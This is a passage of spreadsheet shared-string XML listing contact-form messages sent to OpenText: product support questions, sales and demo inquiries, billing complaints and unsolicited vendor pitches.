  <si>
    <t xml:space="preserve">ello, _x000D_
_x000D_
I hope you are well. _x000D_
_x000D_
My name is Rachel Mealyer and I am a graduate Sports Therapist. I am writing to offer your employees treatment with an initial 10% discount. Before you completely disengage, please read on!_x000D_
_x000D_
A happy and healthy workforce is imperative to productively. _x000D_
_x000D_
I offer _x000D_
Sports massage, _x000D_
Treatment for back or joint pain, _x000D_
Sciatica treatment,_x000D_
Assessment of injuries or pains,_x000D_
Women's health (incontinence, sexual health dysfunction, pre/post pregnancy) _x000D_
Taping techniques,_x000D_
Rehabilitation programme for weight loss/fitness/post surgery_x000D_
General aches and pains_x000D_
I treat patient's of all ages, sporting abilities, occupations and all with very different injuries or aims. These can range from chronic back pain due to a car crash to always rolling ankles to stiff neck from posture at work to helping people become mobile due to age or post surgery. Everyone is welcome._x000D_
I currently treat at patient's houses or work places such as Microsoft, coaching institutions, gym clubs, TVP._x000D_
I offer 30 (£25), 45(£35), 60(£45) minute appointments._x000D_
I am asking if you could circle this message to your workforce. I would be very thankful if so!_x000D_
_x000D_
Kind regards, _x000D_
Rachel Mealyer_x000D_
_x000D_
P.S This is regarding the Reading branch. I have posters that can be circulated. </t>
  </si>
  <si>
    <t>Reminder</t>
  </si>
  <si>
    <t>Bjr,_x000D_
Je suis consultant en ECM/GCE et IM/GI et voudrais explorer les opportunites de partenariat/cooperation a tout echelle avec votre structure. Ayant implemente et travaille avec les produits Opentext pendant 6 ans, et ayant travaille sur d'autres plateformes telles que sharepoint, documentum ou saperion. Je me tiendrais a votre disposition pour entrevoir une quelconque cooperation. Je suis base en Algerie._x000D_
Merci. sinceres salutations</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Tom Clement,_x000D_
_x000D_
I hope this email finds you well. _x000D_
_x000D_
I was following your articles and profile on your Twitter profile, and thought that you might want to extend your audience to young professionals, founders and students._x000D_
_x000D_
My name is Carolina Ascencion, and I am Junior Editor at AlphaGamma [www.alphagamma.eu]. AlphaGamma is a business portal for millennials focused on topics such as entrepreneurship, psychology, fundraising, productivity hacks and career opportunities._x000D_
_x000D_
We are currently looking for gifted writers, and therefore we are excited to invite you to become a contributing author at AlphaGamma._x000D_
_x000D_
For your convenience, you will find more information about this opportunity here [www.alphagamma.eu/public-media/AlphaGamma_Contributing_Writers_Kit.pdf]. If you like the way this sounds, then just fill in the form by following the application link [alphagamma.typeform.com/to/uHJEoU] within the presentation. _x000D_
_x000D_
Please, let me know if you find this opportunity interesting and we are looking forward to hearing from you._x000D_
_x000D_
With best regards,_x000D_
Carolina Ascencion_x000D_
_x000D_
caro.ascencion@alphagamma.eu_x000D_
</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I would like to know more about Open Text digital asset management tools. Please send me a tutorial or sales kit specifically on this product_x000D_
_x000D_
Thank you_x000D_
Duncan</t>
  </si>
  <si>
    <t>Free DWG Viewer does not work - "Invalid license. Unable to load files" even after upgrading. It links to your website to find an update but URL is invalid.</t>
  </si>
  <si>
    <t>I would like an RFP for a document management system/eTMF.</t>
  </si>
  <si>
    <t>Hi there. we are looking for a cost effective archiving solution. I read about some other things you do so may be other synergies. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Interest in understanding opportunities to intergrate document mamanegement with Sucess Factors product for HR Documentation.  Similar approach to that used when I was at the BBC. _x000D_
Also highlight you have a 404 error in your exec materials www.opentext.com/EIM_x000D_
For more information on EIM and how OpenText can help, please visit: _x000D_
www.opentext.com/EIM_x000D_
</t>
  </si>
  <si>
    <t>I am not able to download your app even though my school district uses your services. I am talking about my mobile phone. Is it because it is not an Apple device? Please, help me to solve this issue. Thank you in advance for your help. An alternate email address is oviedsl@nv.Ccsd.net.</t>
  </si>
  <si>
    <t>Procurement of Multimedia Digital asset management system</t>
  </si>
  <si>
    <t>I'm interested in taking online OTCS classes.  Where can I find them on your website?</t>
  </si>
  <si>
    <t>How do I transfer the license from one laptop to another?  (I am upgrading machines but don't want to lose my BRava Desktop.</t>
  </si>
  <si>
    <t>We have a partner looking for an automated forms scanning/OCR solution where 3 users need to automatically identify approx. 300 different types of documents and determine if each is correctly signed, stamped and dated. Does your technology support recognizing signatures, stamps and dates? Which product would be more appropriate for this use? Do you have an estimate on licensing costs?</t>
  </si>
  <si>
    <t>The Surveyor General Branch in Toronto needs to scan hardcopy documents  and load them into GCDocs (OpenText Content Server).  The scanning company we intend to use suggests using a software to generate barcodes to put on the files to identify project numbers prior to scanning.  Ideally we are looking for software that could not only generate barcodes but could automatically populate the metadata fields when the documents are uploaded into GCDocs.  Our department has it's own database that maintains data about these projects which we would like to attach to the metadata of scanned images as they  are uploading to GCDocs?_x000D_
Would you be able suggest third party software capable of doing this?</t>
  </si>
  <si>
    <t>Looking to speak to whoever is in charge of booking special events during the conference at the Metro Toronto Convention centre July 4 to 14_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>unable to update Exceed OnDemain--please advise.  current version: 13.8.0.262</t>
  </si>
  <si>
    <t>Dear Hiring Manager,_x000D_
_x000D_
I have just completed my Junior year at the University of Maryland, College Park where I am pursuing a Marketing degree at the Robert H. Smith School of Business with a minor in Leadership studies. I anticipate graduating by December 2017, a semester ahead of schedule. _x000D_
 _x000D_
I would like to offer my services as a possible summer intern with your office at Open Text and believe I can be a valuable asset to your organization. I have an overall 3.6 GPA and have been on the Dean’s list every semester. I interned at a CPA firm the last two summers and am also quite active in various school activities._x000D_
_x000D_
My email is ankitapatni96@hotmail.com, where I can send you my resume directly. I look forward to the opportunity to meet you in person and discuss my qualifications, experience and interests in more detail. I am reachable by via phone or email._x000D_
 _x000D_
I look forward to hearing from you soon._x000D_
 _x000D_
Best regards._x000D_
 _x000D_
Ankita Patni _x000D_
Ankitapatni96@hotmail.com_x000D_
240-483-7810</t>
  </si>
  <si>
    <t>I am interested in Scanning Solutions for Accounts Payable / Receivable.</t>
  </si>
  <si>
    <t>Would you please provide the differences in the Desktop TX version and the TXL version.  Are these a onetime purchase price or an annual fee?</t>
  </si>
  <si>
    <t>Doing CRM Transformation from SAP CRM5 to Salesforce and have OpenText ECM - LEA currently and wanted to explore the options of ECM for SFDC interms of - On-Prem, Cloud or Hybrid.</t>
  </si>
  <si>
    <t>Greetings,_x000D_
I am contacting you to find out what the charges on my bill is of?  account number 858330    invoice number 17606858330</t>
  </si>
  <si>
    <t xml:space="preserve">I'm in the process of Small Business Start -up. So I'm still working on my Business &amp;Marketing Plans. I served as a PIO, for nearly 18 years for the State of California, Department of Trsnsportation. I'm not ready yet, but would like to inquire if you have either a partnering program, and once my site is launched, I would also like to be a Reseller of your ECM. I would also be interested in IF I Membership. I haven't finished reading that pdf, but I have some related experiences and interest in joining a OH Project._x000D_
_x000D_
Thsnks, </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to see a demo of eDOCS.  </t>
  </si>
  <si>
    <t xml:space="preserve">I requested the Exceed TurboX demo.  First the word "Password" is misspelled on the web page.  Second, the username: demo2 and the password: demo do not work.  I can't access the demo.  Here is the URL I received:  https://etxdemo.opentext.com/etx/?_ga=1.78702353.486231160.1454004849&amp;elqTrackId=F3B81E7EC2787FF680BB2C802818B662&amp;elq=1e0e73dbe51a443c86eb2b9478a51c65&amp;elqaid=32201&amp;elqat=1&amp;elqCampaignId=19823_x000D_
</t>
  </si>
  <si>
    <t>Do you have a video link to see a sample of eDOCS in action please?</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Pourriez-vous m'indiquer si une formation "administration système v16" est prévue avant la fin de l'année ?_x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Sébastien COUTANT</t>
  </si>
  <si>
    <t>Need additional information on performing Redaction on Documents. Is bulk redaction possible as a batch processing.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day Sir / Madam! this is CJ from Palmeo Corporation, i would just like to ask where can i send an email or any contact number of your Accounting or Finance Department, for follow-up of Cheque Payment to Palmeo Corporation._x000D_
_x000D_
Your help is well appreciated, please private message me cj@infotouch.ph or call us, 657-2025 Local 1401._x000D_
_x000D_
Thanks a Bunch! </t>
  </si>
  <si>
    <t xml:space="preserve">Request for proposal on a scope document for Asset Management </t>
  </si>
  <si>
    <t>Interested in become resale partner for OpenText</t>
  </si>
  <si>
    <t>what is the latest version of First Class Client that works with Windows 7 and where do I go to get it (we are currently running version9??)</t>
  </si>
  <si>
    <t>Need a POC so we can get a NDA signed before we request a demo</t>
  </si>
  <si>
    <t xml:space="preserve">Was having a problem getting into the GXS catalogue so I hit the re-set password but have not yet received an e-mail with a new password.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I’m hoping you may be able to help me out here, I’m looking for a part # for this specific fax card:_x000D_
TR1034+E24H-T1-1N-R 24-pt T1/PRI Interface Fax board_x000D_
</t>
  </si>
  <si>
    <t>we have found that large .tiff files(200mb) only display a blank screen with no error when opened using Brava desktop! version 16.0.2. This does not happen when using ver 7. We would like to inquire if this is a known bug with the program or not.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are a First Nations organization looking to update our documents management system. Is this something that OpenText Solutions would be able to do?_x000D_
We have about 50,000 studies, reports, discussion papers and maps that have been generated over the course of the past three decades in relation to the treaty negotiation process. As you can imagine, that’s an unwieldy amount without a searchable library that can be quickly accessed by staff of five organizations any time, any place. It must be secure and password-protected, as the information is confidential, and it must be easily navigable by key search words._x000D_
We would provide the digitized information, including thousands of archival reports scanned as .pdf. We also have maps in .arc and shape files that would need to be included – I don’t have an exact number but I’ll guess 5-10K._x000D_
I’m looking for an estimate on the cost of developing such a library for us and a bit of information about the follow-up customer support. Are there any ongoing costs and what would they be on an annual basis? Also, what is the cost/process for continuing to add to the library? Is that something we can do ourselves fairly easily once the platform is built?_x000D_
_x000D_
Please let me know if you need any further information. I look forward to hearing from you.</t>
  </si>
  <si>
    <t>How we can download the program open text viewer for SAP?</t>
  </si>
  <si>
    <t>Can we use "Free Brava Reader" with windows 7 professional?_x000D_
If we can't use anything but windows 10.... what are our options?</t>
  </si>
  <si>
    <t>Etude en cours pour un appel d'offre national autour de la GED</t>
  </si>
  <si>
    <t xml:space="preserve">Farbest Brands is in the process of sourcing a Document Management System. We have identififed OpenText as a potential solution provider for a document management system._x000D_
_x000D_
Please provide a contact with whom I can share an RFP for this project._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Detailed Information on Content Suit Cloud Edition._x000D_
Currently on Content Server 10/ Archive Server and OpenText ExStream through a re -seller._x000D_
Question_x000D_
DR and hosted in Canada_x000D_
What the managed Service Include_x000D_
Can we get a dedicated VPN connection_x000D_
Is it hosted service or multi tenancy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are a Japanese Fusion Catering company based out of Waterloo looking to see if Open Text would be interested in some catering options for its employees in Waterloo.  We do sushi in bowls, and in giant Sushi Burrito style rolls that are a healthy alternative to sandwiches and regular lunch offerings.  We offer large group discounts as well as an option for our team of Ninjas to come directly into the work place and make food in person._x000D_
_x000D_
Any response or direction to the appropriate contact would be greatly appreciated.  Thank you for you time_x000D_
_x000D_
Aaron Moir_x000D_
_x000D_
hungyrninja.ca_x000D_
519-222-4537</t>
  </si>
  <si>
    <t>TRYING TO DO THE COMPLIANCE CERTIFICATE FOR CARD MACHINE ID 471785</t>
  </si>
  <si>
    <t xml:space="preserve">We recently purchased licensing for Redact-It when it was still IGC. We have refreshed the computers and now need to install Redact-It again. I can't seem to find the install files anymore. Can you assist with this? </t>
  </si>
  <si>
    <t xml:space="preserve">Advice on what package we should buy to accomplish our goal._x000D_
I am under the assumption that RightFax will host most of our fax numbers, receive and send the faxes. If required, have a Virtual Server here at LDI that we can integrate our applications with, receive faxes through email (groups and individuals) and/or receive the fax (for each fax number) to a network share. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are using Exceed v13, and are moving from Windows7 to Windows10.  Will v13 run on Win10?  I get an error: "Fatal error.  CAnnot open default font."  Please help.  </t>
  </si>
  <si>
    <t>I am unable to get validated on the Actuate Developer forums.  I've asked to be sent a validation email multiple times, but none have come.  I've even changed my email address to see if it was a problem with my gmail account, but it still isn't working.  _x000D_
_x000D_
Can you help?</t>
  </si>
  <si>
    <t>Can you put me in touch with our Governmental Agencies Documentum representative?  Our support contract is coming up for renewal, and my manager would like to discuss options.</t>
  </si>
  <si>
    <t>Penn United owns 3 licenses.  At this point only two are used and I need to install the third license for a new programmer.  How do I get the Product Media Code for the new installation?</t>
  </si>
  <si>
    <t xml:space="preserve">I'm researching alternative scheduling software for our call center. I met Mark Aguilar at CC week last year in Vegas and have his card. </t>
  </si>
  <si>
    <t>Does your Saas model support IRS pub 1075 security for potential FTI data. If not, what level of security do you provide? Do you service in cloud other Departments of Revenue? Do you have a process that would take us from v.5.3 to v.16 (without first having to install an on prem instance)?  What is the cost for licensing, maintenance and hosting.</t>
  </si>
  <si>
    <t>Working for government client that is highly interested in exploring capabilities of OpenText for enterprise content management and business process management. We were looking to gather information on specs of setting up an instance of OpenText that is locally hosted and how we would be able to obtain trial licenses for demonstrations. Thank you for the support!</t>
  </si>
  <si>
    <t>Trying to get in touch with our Account Manager to organise Exstream training. Before Exstream moved from HP this was Nigel O'Dell, but we've not been in contact since then and I don't have updated contact details.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, i need a new License Key for StreamServe Tool _x000D_
Version: 2.3.1.002_x000D_
System ID: MDVPITI0N0M_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>We are looking for ID card scanning ocr software. We have a scanner its scans ID cards and put it one folder. From that folder we want take cards with your software recognize Arabic texts and gave us result in database or CSV file. Actually we have 4 or 5 type of ID cards. We want create a templates for which area want to pick and after that we need get cards from  scanned folder and insert to database like a service. Is it your software support like this. Please contact me ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">i purchased Brava! Desktop TX 16.2 software but unfortunately i cannot install on my laptop as i cannot open my account and everytime i reset my password it is always failing._x000D_
_x000D_
please help me to be able to install my brava._x000D_
_x000D_
thank you </t>
  </si>
  <si>
    <t xml:space="preserve">I want to ask some questions on the forum but I'm not getting my validation mails (to activate my account). I've tried several email adresses and checked spam/junk mail.  </t>
  </si>
  <si>
    <t>I CANNOT RESET MY PASSWORD</t>
  </si>
  <si>
    <t>I need a presentation about the company as Petrojet wants to buy a EDMS or PDMS for all the company with all its branches so i need some one experincied to present.</t>
  </si>
  <si>
    <t>Need a Exstream Command Center(with Delivery Manager) training.</t>
  </si>
  <si>
    <t>Does OPENTEXT carry any standalone Enterprise Workflow product that does not consist of document management functionalities? (Preferred to be contact via email)</t>
  </si>
  <si>
    <t xml:space="preserve">To met some one </t>
  </si>
  <si>
    <t>Hello, _x000D_
We have a team of developers who are not only proficient but also_x000D_
masters in their own work profile. We have delivered 500+ project_x000D_
on Website and Mobile Apps. Also have 100+ repeated clients. We are_x000D_
working on different technologies like PHP, Node, MySQL, SQL, MongoDB, PostgreSQL_x000D_
Web Application, e-Commerce Website design &amp; Promotions, CMS and many_x000D_
others. If you have any type of requirement please do let us know. We_x000D_
assure you we’ll never disappoint you._x000D_
Our Services:_x000D_
· Website Design &amp; Maintenance_x000D_
· Mobile Apps Development_x000D_
· Web Application Development_x000D_
· e-Commerce Development_x000D_
· e-Learning Website_x000D_
· SEO, SEM, SMO, SMM_x000D_
Please do let me know, If you are interested in any services mentioned_x000D_
above &amp; share your requirement to review. I will send you more details,_x000D_
examples, pricing, project plan etc._x000D_
Best Regards:_x000D_
Leesa_x000D_
(Marketing Manager)</t>
  </si>
  <si>
    <t>Would like to know more on "Brava with Sharepoint"</t>
  </si>
  <si>
    <t>I'm unable to create service support requests. Please enable my account ASAP and also add the accounts from andrew.winegar@wdc.com and lawrence.romero@wdc.com to the WDC account as they will also need to create service requests. This is urgent please as we have an issue with exceed on demand.</t>
  </si>
  <si>
    <t>Quote</t>
  </si>
  <si>
    <t xml:space="preserve">Can not access GXS catalog due to incorrect password. The password reset email is being sent to someone who is no longer with the company. </t>
  </si>
  <si>
    <t>Planning an upgrade</t>
  </si>
  <si>
    <t>Can't access my support. I had confirmed the email address but it kept prompted me to confirm my email.</t>
  </si>
  <si>
    <t>The problem of Many forms are delivered to the program teams through direct emails and faxes that often need to be sorted and then redirected to other associates to take in support of the patient journey._x000D_
_x000D_
The impact of which is	This sorting process results in lost time and effort that could be better spent addressing patient support activities  ( i.e. patient on drug faster , quicker determination of payment path for patient)_x000D_
_x000D_
A solution would be	To identify the right requirements for full solution to barcoding/OCR forms for faster processing. We need a off the shelf software where we can work with our IT team to bridge the gap between the solution you provide.</t>
  </si>
  <si>
    <t>I need to close out my account. Contract number: USSC-36694. Customer Number: US01-105722. Company: Rigdon Creative Solutions LLC. _x000D_
 _x000D_
Also, I paid my bill in April of 2017. The invoice number for that bill is: 660523467. In the amount of $1,060.00. I need to be refunded the entire amount of $1,060.00. _x000D_
I called back in April to see what the bill was for and I was told it was for GS1. I need GS1 so I paid the bill. This month I received a bill from GS1 and called GS1 and told them I already paid them through a company called OpenText. I was told by the GS1 representative that she has never heard of OpenText and that Open Text is not associated with GS1 and that I had not paid my GS1 bill. I called OpenText back after that call and spoke with a different representative who informed me that I opened the account with OpenText for Belk Co. Belk Co. is no longer ordering from me and thus I would have never paid invoice 660523467 had I been told the correct information and I would have requested then that the account be closed._x000D_
 _x000D_
So in conclusion I am needing two things:_x000D_
1. My account closed_x000D_
2. A refund of $1,060.00</t>
  </si>
  <si>
    <t>To deliver 2017 Silver Partner Application FEE P.O.</t>
  </si>
  <si>
    <t>RFA would like to establish a partnership with Open Text. Who should I contact ?</t>
  </si>
  <si>
    <t>Our company is researching different Digital Asset Management systems to help us organize our multitude of digital assets. We'd like to learn more about OpenText and see a demo of your solution. Thank you!</t>
  </si>
  <si>
    <t>Not able to login to support portal</t>
  </si>
  <si>
    <t>Hi Team_x000D_
_x000D_
Unable to access mysupport portal._x000D_
Could you please have a look_x000D_
_x000D_
Regards, Parvesh_x000D_
_x000D_
Parvesh Kaushal_x000D_
WilliamsLeaTag</t>
  </si>
  <si>
    <t>I need to have G938B/ZZ defined for sending and receiving with Ford</t>
  </si>
  <si>
    <t>Looking for a solution to transform fax and email orders into digital files that can be uploaded into our ERP systems (Dynamics AX).</t>
  </si>
  <si>
    <t>I am looking to find some information regarding the application Actuate.  Specifically information regarding the infrastructure, the compatibility of certain databases and operating systems, and if the application can be moved to a more cloud based model.</t>
  </si>
  <si>
    <t xml:space="preserve">I was hoping to confirm your AP solution provides the following:_x000D_
_x000D_
• Dynamic Discounting_x000D_
• Vendor Set-up_x000D_
• OCR_x000D_
• E-Invoicing _x000D_
•  Payment status inquiry capability _x000D_
• Invoice exceptions/routing to buyers workflow_x000D_
• Non-PO payment solution available _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
_x000D_
We are looking for a Software for our AS2 communications with various companies (aprox. Between 10 and 16 Partners)._x000D_
Our requirements are:_x000D_
-              We need a Software Product that can be installed in our servers, and manages the AS2 connections end to end._x000D_
-              The possibility to add and remove partners and licenses on demand without affecting any other partners (no restarts required)._x000D_
-              Access to a support service of rapid response (we appreciate a detailed SLA)._x000D_
_x000D_
Please send us price and requirements according to our needs. We appreciate to you clarify the commercial licensing mode (license + yearly maintenance cost  / yearly fixed service costs with no license cost / etc.)._x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
_x000D_
I am attempting to evaluate some possible solutions for a customer requirement to send faxes from within our Computer Aided Dispatch software. As such, I'd like to request some extra information and clarification about a couple of your products._x000D_
_x000D_
1. Regarding the RightFax Connector for Exchange, is it possible to utilise this product without using an email client e.g. by addressing an email to a particular address such as [faxnumber]@domain.com or via an API?_x000D_
_x000D_
2. Regarding the OpenText Fax2Mail cloud fax service, again could you please clarify the method of interaction with this service, whether it's via an API or through email addresses?_x000D_
_x000D_
3. What security considerations are available in the Fax2Mail service for the transmission of sensitive or confidential information?_x000D_
_x000D_
4. What development resources are available for either product, e.g. development guides/documentation, test accounts for Fax2Mail etc.?_x000D_
_x000D_
5. Lastly, could you please provide an outline of the costs for the RightFax Connector for Exchange and Fax2Mail services?_x000D_
_x000D_
Yours Faithfully_x000D_
David Warrington</t>
  </si>
  <si>
    <t>Hi -- I am interested in learning more about learning more about eDOCS as a solution for contract management. What features are available? I think we're looking for something cloud based that allows for granular permissions, version control, and native comparing capabilities. Something pretty lightweight. _x000D_
_x000D_
Thanks, _x000D_
Sara</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, My name is Valentine simo and I live in Dallas TX and a master's degree graduate from Oklahoma....I am a new designer of a very powerful, affordable, classy and elegant new ladies fashion line that has just been introduced into the market and I was wondering if your company will like to have them into your Extremely beautiful stores....It took me two years to finally put these designs together and they where just manufactured and looking to get them into the right store like yours for exposure and sales purposes.....I will be extremely honored if they will be considered by your store as part of your family of brands.....The name of my designs is called NATURAL BEAUTY BY VALENTINE and  the website for my designs so you can take a look at them is called......._x000D_
www.naturalbeautybyvalentine.com._x000D_
Your attention and response to my concern will be very very TREMENDOUSLY APPRECIATED... Looking forward to speaking with you as soon as possible. My phone number in cases I need to be reached by phone directly is 817 217 3690._x000D_
Have a wonderful day and blessings._x000D_
</t>
  </si>
  <si>
    <t>Trying to get our Right fax support contract renewed.  We previously had our contract through Snap soft and have been told they can no longer provide us support and that we now have to purchase it directly with Open text.  Our contract is currently expired since December 31 2016 and we need to get it renewed so we can get our Right fax system upgraded to support Windows 10.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, my name is Ethan Campbell with Conference Ventures. This year is the fourth annual Indy Big Data Conference and the Inaugural Washington, D.C., Big Data Conference. The Indy Big Data Conference has become one of Indiana’s top tech conferences with more than 1,500 attendees expected this year. We would like to invite you to be a sponsor at either or both of these conferences. We have many different sponsorship opportunities ranging from having a spot in our Conference Program up to having a Company Booth in the Exhibit Hall. If you are interested in talking more about our sponsorship opportunities, please contact me at your earliest convenience. </t>
  </si>
  <si>
    <t>New demo test license</t>
  </si>
  <si>
    <t>Non-responsive sales rep and delay in service registration. Sales person is Gabriel Medel for North America.</t>
  </si>
  <si>
    <t xml:space="preserve">Customer Experience suite presentation and possible engagement._x000D_
I have worked with Exstream at another location and am looking to introduce it and possibly more here. The number is my mobile. Please leave a message if I do not answer. </t>
  </si>
  <si>
    <t>Hello ,_x000D_
Merchandising Manager, Jewelry_x000D_
_x000D_
We are Manufacturers of Gold Jewelry (9k-18k) and Sterling Silver Jewelry (92.5) with Diamonds &amp; Precious and Semi-Precious Gemstones such as Emerald, Ruby, Sapphire, Tanzanite, Yellow Berryl, Blue Zircon, and many more. _x000D_
_x000D_
We are located in SEZ-II, Jaipur, India, we have a factory with the strength of 200 workers currently, who are working precisely to make each and every jewelry a piece of art. _x000D_
_x000D_
We are working for many TV Channel currently such as QVC (Germany), JTV (USA), TVSN (Australia), M6 (France) as well as other clients. _x000D_
_x000D_
We would like to start some business with your company, kindly give us chance to represent our jewelry. _x000D_
_x000D_
Regards, _x000D_
_x000D_
Nikhil Baid_x000D_
Mob: +91-99286-49757_x000D_
___________________________________x000D_
SHRI ARIHANT MANGAL EXPO IMPO_x000D_
F-28, SEZ-II,_x000D_
Sitapura Industrial Area, _x000D_
Jaipur, India</t>
  </si>
  <si>
    <t>Hello Boscov's,_x000D_
Merchandising Manager, Jewelry_x000D_
_x000D_
We are Manufacturers of Gold Jewelry (9k-18k) and Sterling Silver Jewelry (92.5) with Diamonds &amp; Precious and Semi-Precious Gemstones such as Emerald, Ruby, Sapphire, Tanzanite, Yellow Berryl, Blue Zircon, and many more. _x000D_
_x000D_
We are located in SEZ-II, Jaipur, India, we have a factory with the strength of 200 workers currently, who are working precisely to make each and every jewelry a piece of art. _x000D_
_x000D_
We are working for many TV Channel currently such as QVC (Germany), JTV (USA), TVSN (Australia), M6 (France) as well as other clients. _x000D_
_x000D_
We would like to start some business with your company, kindly give us chance to represent our jewelry. _x000D_
_x000D_
Regards, _x000D_
_x000D_
Nikhil Baid_x000D_
Mob: +91-99286-49757_x000D_
___________________________________x000D_
SHRI ARIHANT MANGAL EXPO IMPO_x000D_
F-28, SEZ-II,_x000D_
Sitapura Industrial Area, _x000D_
Jaipur, India</t>
  </si>
  <si>
    <t>As Brigex , we give services to software development tool providers for building/expanding their reseller channel globally._x000D_
_x000D_
Within the scope of our service, we find the companies that are interested in reselling/representing your products and we organize online meetings with them for starting business partnerships._x000D_
_x000D_
We charge for the meetings that take place with interested resellers. We do not charge any upfront or retainer fees._x000D_
_x000D_
Please get back to me, if you are interested in cooperating with us for establishing reseller partnerships.</t>
  </si>
  <si>
    <t>OPEN TEXT Download.zip expires on date that is in the past. _x000D_
_x000D_
I downloaded a zip file on the 12th of June and it expired on the 10th of March. So zip file is not valid. This is with every file you download.</t>
  </si>
  <si>
    <t>Dear, we are currently looking for a Document Management System that could also manage an eTMF and/or publishing capabilities towards drug submissions. On your website I see your company is offering the 'Documentum OpenText' solution. Would it be possible to organize a demo in the coming weeks?_x000D_
Many thanks,_x000D_
Kris</t>
  </si>
  <si>
    <t>i interest to buy OpenText Brava! Reader software please  send contact or email to sayan@csloxinfo.net</t>
  </si>
  <si>
    <t>We are exploring the possibility to introduce a CMS in our organization. First for the tax documents and later extend to other areas like procurement, products, etc._x000D_
We'd like to be contacted to have more information and receive a proposal._x000D_
Best Regards_x000D_
Alessandro Falorni</t>
  </si>
  <si>
    <t>access learning central and avail training partner program</t>
  </si>
  <si>
    <t>we need Distribution of your solution in Pakistan .</t>
  </si>
  <si>
    <t>UNABLE TO VIEW GRAPHS IN HOME SCREEN OF INOVIS WORKS (home transaction summary)  VIEWING ON NEW PC WITH WIN 7. I.E.11</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for VNC like alternative for Chip design company. </t>
  </si>
  <si>
    <t>we got logged out and i needed to reset pw but not sure to whos email the new pw is going to. Network Id :R5371_x000D_
user id: R5371A</t>
  </si>
  <si>
    <t>hello good day,  we need a product demo Vendor Invoice Management for SAP  _x000D_
thank you</t>
  </si>
  <si>
    <t>I have used DocsOPEN previously in private practice law firms and wish to find out more details to see if I can implement it in my own personal business (a small trade marks law firm).</t>
  </si>
  <si>
    <t>Dear team,_x000D_
I am implementing a new team for a client and I would like to install Open Text Socks in a Linux OS. Would it be possible? Is there any possible solution for this?_x000D_
I am looking forward to hear from you soon._x000D_
Best Regards,_x000D_
Francisco Nunes</t>
  </si>
  <si>
    <t xml:space="preserve">Open Text DAM w/ Hybris  implementation services. Please email me to arrange time to discuss. </t>
  </si>
  <si>
    <t>We need to reset our password for Q875 but the email you have on record is for an employee who is no longer with our company. This is URGENT. Thank you</t>
  </si>
  <si>
    <t>I spoke with a sales rep, Evan, and he referred me to a distribution list 'npartners@opentext.com' and I get the mail rejected. We are a Xerox company with Global Imaging. We sell Xerox MFDs to small and medium business clients in Chicago. We have several customers that have outgrown the built in faxing on their devices. We’re looking at offering a simple fax server appliance as one of our solutions, and it seems the RightFax Express appliance would fit in nicely. Can we get some more info on pricing and how to order?</t>
  </si>
  <si>
    <t>Looking for a software platform to potentially OEM into our core offering.</t>
  </si>
  <si>
    <t>Pricing - local VAR</t>
  </si>
  <si>
    <t>What is your availability for an initial information gathering demo of the OpenText Record Management &amp; eDiscovery tool for the following dates?_x000D_
_x000D_
June 19th in the afternoon_x000D_
June 20th_x000D_
June 21st (9am to 11am)_x000D_
_x000D_
Thank you, _x000D_
_x000D_
Beatriz Collazo</t>
  </si>
  <si>
    <t>OT Enterprise World_x000D_
As an OT Partner, supporting Alchemy Document Management clients, do we have access to the conference? Also, is there any requirement for assistance to do with Alchemy on the booth?</t>
  </si>
  <si>
    <t>I've newly taken the position here. I'm looking at opportunities for shows to exhibit. It's a little late for this one. However, I'd like to attend the show this year, to evaluate the opportunity for next year. Is there a way to get a gratis or reduced entry ticket to check it out. I'm not looking to take advantage of the educational opportunities or anything, just looking to evaluate the show for future participation.</t>
  </si>
  <si>
    <t>Interested in learning more about your product to replace current shared drive document system and to enable better e-mail storage options.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I hope you are well. _x000D_
_x000D_
My name is Rachel Mealyer and I am a graduate Sports Therapist. I am writing to offer your employees treatment with an initial 10% discount. Before you completely disengage, please read on!_x000D_
_x000D_
A happy and healthy workforce is imperative to productively. _x000D_
_x000D_
I offer _x000D_
Sports massage, _x000D_
Treatment for back or joint pain, _x000D_
Sciatica treatment,_x000D_
Assessment of injuries or pains,_x000D_
Women's health (incontinence, sexual health dysfunction, pre/post pregnancy) _x000D_
Taping techniques,_x000D_
Rehabilitation programme for weight loss/fitness/post surgery_x000D_
General aches and pains_x000D_
I treat patient's of all ages, sporting abilities, occupations and all with very different injuries or aims. These can range from chronic back pain due to a car crash to always rolling ankles to stiff neck from posture at work to helping people become mobile due to age or post surgery. Everyone is welcome._x000D_
I currently treat at patient's houses or work places such as Microsoft, coaching institutions, gym clubs, TVP._x000D_
I offer 30 (£25), 45(£35), 60(£45) minute appointments._x000D_
I am asking if you could circle this message to your workforce. I would be very thankful if so!_x000D_
_x000D_
Kind regards, _x000D_
Rachel Mealyer_x000D_
_x000D_
P.S This is regarding the Reading branch.</t>
  </si>
  <si>
    <t>tengo una dudas sobre la diferencia entre la salidad Html y PDF de birt</t>
  </si>
  <si>
    <t>We have been using your "imagination" for many years, we are finally at the point where we no longer see a use for this software anymore as it is discontinued as one of your softwares. We have 1000's of files that are saved in imagination. When you developed OpenText, did you keep the Imagination users in mind and are is there an easy switch from Imagination to OpenText going forward?</t>
  </si>
  <si>
    <t xml:space="preserve">Client is looking to change the way they do EDI.   Evaluating outsourcing EDI vs. keeping it in house.  </t>
  </si>
  <si>
    <t>Need refund for invoice SUS08308444 as it was paid twice._x000D_
